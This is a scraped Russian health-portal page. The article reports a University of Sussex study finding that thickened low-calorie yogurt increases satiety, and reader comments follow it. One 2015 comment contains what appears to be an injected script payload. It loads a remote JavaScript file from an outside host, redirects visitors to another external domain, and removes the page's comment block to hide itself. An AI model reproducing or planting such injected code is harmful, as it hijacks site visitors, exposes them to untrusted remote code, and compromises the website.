Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Низкокалорийный продукт м...  >>  Низкокалорийный продукт может быть сытным
 
Обратная связь
 

Низкокалорийный продукт может быть сытным

Размер шрифта
25 января 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Многие люди, употребляющие низкокалорийные продукты, не испытывают ощущения сытости. Британским ученым удалось решить эту проблему.

низкокалорийный продукт

Ученые из Университета Суссекса провели эксперимент, в ходе которого им предстояло выяснить, как добавление загустителя влияет на текстуру йогурта и субъективные ощущения потребителей.

В первой части эксперимента ученые установили, что даже самые неискушенные потребители почувствовали разницу после добавления загустителя, несмотря на то, что вкус йогурта не изменился. Вторая часть эксперимента также прошла удачно, поскольку после употребления йогурта с загустителем участники эксперимента чувствовали себя более сытыми. Кроме того, участники эксперимента отметили, что йогурт с загустителем на некоторое время подавлял аппетит.

«Ощущение сытости зависит не только от количества калорий, содержащихся в пище, которую мы едим. Электрические импульсы, поступающие в головной мозг из желудка, имеют большое значение, но не менее важны ощущения во рту. Воздействуя на текстуру йогурта, нам удалось улучшить субъективные ощущения потребителей. Более густой йогурт дает ощущение сытости и на некоторое время подавляет аппетит», – рассказывает автор исследования Кери МакКрикерд.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

27 января 2013 в 09:59

Цитировать   |   Пожаловаться

Это действительно так. Я даже по себе замечала, что как только начинаю есть тот же самый низкокалорийный йогурт, жидкий, то даже после того, как я съем 2 штуки - чувство голода у меня не проходит, 

2 - zzzzzz

30 июня 2015 в 23:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Ученые выяснили, чем вы рискуете, используя обезжиренные соусы. Требует ли красота таких жертв?   Измените свои привычки питания   25 способов сжечь 100 килокалорий   Что случится через час после гамбургера  
01 августа 2012Вы рискуете, используя обезжиренные соусы 27 июля 2011Фаст-фуды борются калориями
 
27 июля 2011Макдональдс снижает калорийность Хэппи Милов 24 января 2013Низкокалорийный продукт может быть сытным
 

Слайдшоу

1
15 худших перекусов. Часть 1
Как выглядят 100 калорий
Суперперекусы меньше 200 калорий

Тесты

Правильно ли вы худеете?
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.